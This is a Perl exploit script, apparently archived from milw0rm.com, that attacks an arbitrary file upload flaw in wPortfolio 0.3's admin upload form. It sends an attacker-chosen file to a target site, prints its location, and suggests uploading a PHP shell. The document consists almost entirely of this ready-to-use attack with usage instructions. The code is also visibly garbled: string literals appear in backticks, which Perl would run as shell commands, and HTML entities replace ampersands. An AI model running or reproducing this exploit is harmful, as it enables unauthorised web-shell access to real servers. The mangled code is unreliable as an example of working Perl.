wPortfolio <= 0.3 Remote Arbitrary File Upload Exploit#!/usr/bin/perl

# Name: wPortfolio <= 0.3 Arbitrary File Upload Exploit
# Script Name: wPortfolio 0.3
# Download: http://sourceforge.net/project/downloading.php?group_id=244834&amp;use_mirror=kent&amp;filename=wPortfolio.zip&amp;80791070
# Vulnerability: Arbitrary File Upload
# Vulnerable page: /admin/upload_form.php
# * You can upload everything you want, why not a php shell? ^^
# Author: Osirys
# Contact: osirys[at]live[dot]it
# Proud to be Italian 
# Thx: athos

use LWP::UserAgent;
use HTTP::Request::Common;

my $path        = `/admin/upload_form.php`;
my $d_fold      = `/admin/tmp/`; 
my($host,$file) = ($ARGV[0],$ARGV[1]);

($host,$file) || help(`-1`);
cheek($host) == 1 || help(`-2`);
&amp;banner;
my $url = $host.$path;

my $ua = LWP::UserAgent->new;
my $re = $ua->request(POST $url,
                      Content_Type => 'form-data',
                      Content      => [file_to_upload => [$file]] 
                      );

if ($re->is_success) {
    print `[+] Uploaded ! \n`;
    print `[+] Link: `.$host.$d_fold.$file.` \n`;
}
else {
    print `[-] Upload failed ! \n`;
}

sub cheek() {
    my $host = $_[0];
    if ($host =~ /http:\/\/(.*)/) {
        return 1;
    }
    else {
        return 0;
    }
}

sub banner {
    print `\n`.
          `  ========================================== \n`.
          `     wPortfolio 0.3 Arbitrary File Upload \n`.
          `     Author: Osirys \n`.
          `     osirys[at]live[dot]it \n`.
          `     Proud to be italian \n`.
          `  ========================================== \n\n`;
}

sub help() {
    my $error = $_[0];
    if ($error == -1) {
        &amp;banner;
        print `\n[-] Cheek that you typed the hostname address and the local file to upload !\n`;
    }
    elsif ($error == -2) {
        &amp;banner;
        print `\n[-] Bad hostname address !\n`;
    }
    print `[*] Usage : perl $0 http://hostname/cms_path local_file_to_upload \n\n`;
    exit(0);
}

# milw0rm.com [2008-11-19]